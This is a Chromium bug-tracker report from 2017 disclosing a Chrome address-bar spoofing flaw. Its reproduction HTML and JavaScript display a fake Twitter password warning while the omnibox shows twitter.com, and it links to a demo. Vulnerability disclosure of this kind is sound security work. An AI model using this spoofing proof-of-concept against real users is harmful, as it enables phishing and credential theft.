Issue metadata
Sign in to add a comment
|
Security: Chrome Preloading page Spoofing
Reported by
xis...@gmail.com,
Mar 23 2017
|
||||||||||||||||||||||
Issue description
VERSION
Chrome Version: 57.0.2987.110+[Stable]
Operating System: [Windows/MAC]
REPRODUCTION CASE
Chrome Preloading page Spoofing
index.html
<script>
function next() {
if (n < 800) {
w.location.replace('https://twitter.com');
setTimeout("next();", 1);
n++;
}
}
function f() {
w = window.open("tt.html", "new");
setTimeout("next();", "1000");
n = 0;
}
</script>
<a href="#" onclick="f()">Login Twitter</a>
tt.html
<title>Twitter</title>
<p>
<font size="100" face="arial" color="red">Waring!!Please change your Twitter password!!</font>
</p>
<script>
location = 'https://twitter.com';
</script>
,
Mar 24 2017
data:URL?? No data:URL. Please open this online Demo: http://xisigr.com/test/spoof/chrome/pageloading_sdfajsdlfwef8fR.html# MACOS:10.12.4 / Chrome:57.0.2987.110 (64-bit) You can see a flash of the "Warning!!!" page for a few seconds,at the same time the Omnibox shows twitter.com. The user will think that this is the twitter preload page.
,
Mar 24 2017
Thank you for providing more feedback. Adding requester "rsesek@chromium.org" to the cc list and removing "Needs-Feedback" label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 24 2017
,
Jul 5 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by rsesek@chromium.org
, Mar 23 2017